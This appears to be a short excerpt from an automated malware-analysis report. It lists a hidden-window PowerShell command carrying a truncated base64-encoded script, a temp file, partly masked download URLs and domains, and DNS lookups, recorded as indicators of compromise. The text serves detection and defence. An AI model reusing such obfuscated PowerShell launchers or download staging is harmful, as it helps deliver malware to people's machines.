Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\725638.cvr
- 'ne###xtrade.com':80
- 'ne###xtrade.com':443
- http://ne###xtrade.com/wp/kgMUT/
- DNS ASK ha#####lifestore.com
- DNS ASK ne###xtrade.com
- DNS ASK el####pparel.com
- DNS ASK su####sworth.com
- DNS ASK ga#######rsrepairraleigh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...' (with hidden window)